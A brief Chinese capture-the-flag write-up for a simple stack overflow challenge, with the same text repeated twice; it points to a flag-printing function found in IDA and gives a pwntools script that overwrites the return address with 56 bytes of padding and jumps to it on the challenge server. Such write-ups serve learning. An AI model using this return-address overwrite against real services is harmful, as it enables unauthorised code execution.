这道题是一道简单的栈溢出
直接用IDA查看
很明显的得到flag的函数
直接上exp
from pwn import *
p=remote('114.116.54.89',10003)
p.recvuntil('something?')
payload='a'*56+p64(0x400751)
p.sendline(payload)
p.interactive()
这道题是一道简单的栈溢出
直接用IDA查看
很明显的得到flag的函数
直接上exp
from pwn import *
p=remote('114.116.54.89',10003)
p.recvuntil('something?')
payload='a'*56+p64(0x400751)
p.sendline(payload)
p.interactive()